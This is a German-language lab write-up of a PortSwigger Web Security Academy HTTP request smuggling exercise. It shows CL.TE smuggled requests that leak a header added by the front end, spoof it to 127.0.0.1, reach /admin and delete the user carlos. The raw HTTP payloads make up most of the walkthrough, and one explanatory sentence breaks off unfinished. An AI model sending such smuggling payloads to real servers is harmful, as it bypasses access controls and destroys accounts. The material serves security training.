> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/request-smuggling/discovery-of-rewriting-by-the-front-end.md).

# Entdeckung der Umschreibung durch das Front-End

### Ausnutzung von HTTP Request Smuggling, um das Umschreiben von Front-End-Anfragen aufzudecken

Die Website basiert auf einem Front-End-Server und einem Back-End-Server. Das Front-End\*\* akzeptiert kein Chunked Encoding\*\*. / Der Zugriff auf das Admin-Board /admin ist Benutzern von **127.0.0.1**. / Bevor das Front-End Anfragen an das Back-End weiterleitet, \*\* fügt es einen benutzerdefinierten Header mit der IP-Adresse des Kunden hinzu\*\*. Dieses Verhalten ähnelt dem klassischen X-Forwarded-For, aber der Header-Name ist anders.

Das Ziel ist zweifach:

1. **Leite eine Anfrage** um den Namen dieses vom Front-End hinzugefügten Headers aufzudecken.
2. **Sende eine geschmuggelte** Anfrage, die diesen Header enthält und ihn auf den Wert 127.0.0.1 erzwingt, um auf das Admin-Panel zuzugreifen und den Benutzer carlos zu löschen.

<figure><img src="/files/c48fe18bebba887260a395a918d1b7d394ef818c" alt=""><figcaption></figcaption></figure>

#### **Verhaltensanalyse**

* Das im Suchparameter gesendete Feld wird in der Antwort zurückgegeben, was zeigt, dass wir es verwenden können, um die Auswirkungen unserer Injektionen zu beobachten.
* Senden:

```http
Content-Length: 5
Transfer-Encoding: chunked

0


```

die Anfrage wird ohne Fehler verarbeitet (200 OK), was bestätigt, dass **das Front-End Content-Length interpretiert**, während **das Back-End Transfer-Encoding ignoriert**.

* Beim Einschmuggeln einer zusätzlichen POST-Anfrage:

```http
Content-Length: 55
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Content-Length: 13

search=test
```

die überzähligen Bytes (hier,

* Durch Erhöhen von Content-Length auf 125 gibt die Antwort den vom Front-End hinzugefügten Header preis. / Dieser Header ist:

```http
Content-Length: 125
```

<figure><img src="/files/8a6aa1a1cfba6c4cbb0da70476b87634665a5473" alt=""><figcaption></figcaption></figure>

<sub>X-KwWCmS-Ip</sub>

<figure><img src="/files/bdce7e9b8efe8a6083789c390129c5a5a2ae2680" alt=""><figcaption></figcaption></figure>

#### **Zugriff auf das Administrationspanel**

Durch das Fälschen einer geschmuggelten Anfrage, die diesen Header enthält, erzwungen auf **127.0.0.1**, erhältst du Zugriff auf /admin:

```http
POST / HTTP/1.1
Host: 0a740022030a5b81820ebfb900ae0054.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Transfer-Encoding: chunked

0

POST /admin HTTP/1.1
X-KwWCmS-Ip: 127.0.0.1
Content-Length: 13

search=test
```

<figure><img src="/files/6e12532f779cfcb4faab6362e5c4a2c4752c415e" alt=""><figcaption></figcaption></figure>

#### **Löschung des Benutzers Carlos**

Eine zweite geschmuggelte Anfrage ermöglicht es dir, den Delete-Endpunkt direkt aufzurufen:

```http
POST / HTTP/1.1
Host: 0a740022030a5b81820ebfb900ae0054.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Transfer-Encoding: chunked

0

POST /admin/delete?username=carlos HTTP/1.1
X-KwWCmS-Ip: 127.0.0.1
Content-Length: 13

search=test
```

Der Benutzer carlos wird dann über das Back-End gelöscht, wodurch es wie eine autorisierte interne Anfrage aussieht.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/request-smuggling/discovery-of-rewriting-by-the-front-end.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
